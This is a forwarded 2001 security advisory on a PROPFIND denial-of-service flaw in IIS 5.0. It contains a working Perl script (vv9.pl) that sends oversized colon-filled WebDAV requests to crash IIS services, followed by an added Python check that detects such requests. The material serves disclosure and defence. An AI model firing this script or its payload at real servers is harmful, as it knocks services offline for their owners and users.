From: Mark Curphey (markCURPHEY.COM)
Date: Sun May 06 2001 - 23:23:01 CDT


    FYI

    -----Original Message-----
    From: owner-securityguninski.com [mailto:owner-securityguninski.com]On
    Behalf Of Georgi Guninski
    Sent: Sunday, May 06, 2001 5:27 AM
    To: securityguninski.com
    Subject: IIS 5.0 PROPFIND DOS #2

    Georgi Guninski security advisory #44, 2001

    IIS 5.0 PROPFIND DOS #2

    Systems affected:
    IIS 5.0

    Risk: Medium
    Date: 6 May 2001

    Legal Notice:
    This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it
    unmodified. You may not modify it and distribute it or distribute parts of it
    without the author's written permission.

    Disclaimer:
    The opinions expressed in this advisory and program are my own and not of
    any company. The usual standard disclaimer applies, especially the fact that
    Georgi Guninski is not liable for any damages caused by direct or indirect use
    of the information or functionality provided by this advisory or program.
    Georgi Guninski bears no responsibility for content or misuse of this advisory
    or program or any derivatives thereof.

    Description:

    It is possible to remotely restart all IIS related services using specially
    crafted requests. If these requests are repeated, this seriously affects IIS
    performance.

    Details:

    Basically the problem is very long but valid PROPFIND requests containing
    lots of ":".

    Demonstration:

    --vv9.pl-------------------------------------------------------------------
    #!/usr/bin/perl
    # usage: vv9.pl host port
    use IO::Socket;
    printf "Written by Georgi Guninski wait some time\n";
    $port = $ARGV[1];
    $host = $ARGV[0];

    sub vv
    {
    $ll=$_[0];   # number of ":" characters to send
    $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
    $over=":" x $ll ; # the ":" is the most important
    $ch=pack("C",65); # just to check whether potential payload is possible - yes
    $tmp = $ch x 64;
    $over= $ch x 4 . $over . $tmp;
    $over1=":" x $ll; #not sure about this

    # long ":" run both in the xmlns:u namespace URI and in the element name
    $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over1".':">';
    $xml=$xml.'<a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
    $l=length($xml);
    $req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
    syswrite($socket,$req,length($req));
    print ".";
    $socket->read($res,200);
    print $res;
    close $socket;
    }

    vv(59060);
    #this is overflow, repeat several times - 49060 seems the smallest #, may need to change
    sleep(1);
    vv(59060);

    ---------------------------------------------------------------------------

    Workaround: Disabling WebDav extensions may help
    though I do not recommend using IIS on the Internet.

    Vendor status:
    Microsoft was informed on 1 May 2001

    Regards,
    Georgi Guninski
    http://www.guninski.com
    ----------------------
    You may visit Guninski Security Mailing List page at
    http://www.guninski.com/mailinglist.html
    ----------------------
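The following Python check is an added example, not part of Guninski's advisory or the vv9.pl script above: it parses a raw HTTP request and flags the two features the advisory describes, an oversized PROPFIND body and long runs of ":" inside the XML. The thresholds, the host name and the sample requests are constructed for this example.

```python
import re

# Thresholds are assumptions for this example: a legitimate PROPFIND body is a few
# hundred bytes, while the advisory's script sends tens of thousands of ':'.
MAX_PROPFIND_BODY = 16384
MAX_COLON_RUN = 64

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, headers, body).
    The advisory's script ends its head with a bare "\\n\\n", so accept both forms."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        head, _, body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").splitlines() or [""]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].split(" ", 1)[0], headers, body

def assess_propfind(raw: bytes) -> list:
    """Return the reasons a request matches the advisory's pattern (empty = clean)."""
    method, headers, body = parse_request(raw)
    if method.upper() != "PROPFIND":
        return []
    reasons = []
    declared = headers.get("content-length", "0")
    size = max(int(declared) if declared.isdigit() else 0, len(body))
    if size > MAX_PROPFIND_BODY:
        reasons.append(f"oversized PROPFIND body ({size} bytes)")
    # longest run of consecutive ':' anywhere in the XML body
    longest = max((len(m) for m in re.findall(rb":+", body)), default=0)
    if longest > MAX_COLON_RUN:
        reasons.append(f"run of {longest} ':' characters in body")
    return reasons

def make_request(body: bytes) -> bytes:
    """Wrap an XML body in a PROPFIND request (constructed sample input)."""
    return (b"PROPFIND / HTTP/1.1\r\nHost: webdav.example.test\r\n"
            b"Content-Type: text/xml\r\nContent-Length: %d\r\n\r\n" % len(body) + body)

# Constructed samples: an ordinary PROPFIND and one shaped like the advisory's request.
BENIGN = make_request(b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:">'
                      b'<a:prop><a:displayname /></a:prop></a:propfind>')
COLONS = b":" * 59060
SUSPICIOUS = make_request(b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'
                          + COLONS + b':"><a:prop><a:displayname /><u:' + COLONS
                          + b' /></a:prop></a:propfind>')
```

`assess_propfind(BENIGN)` returns an empty list, while `assess_propfind(SUSPICIOUS)` returns both reasons; the same function can be run over captured requests from a proxy or IDS pcap.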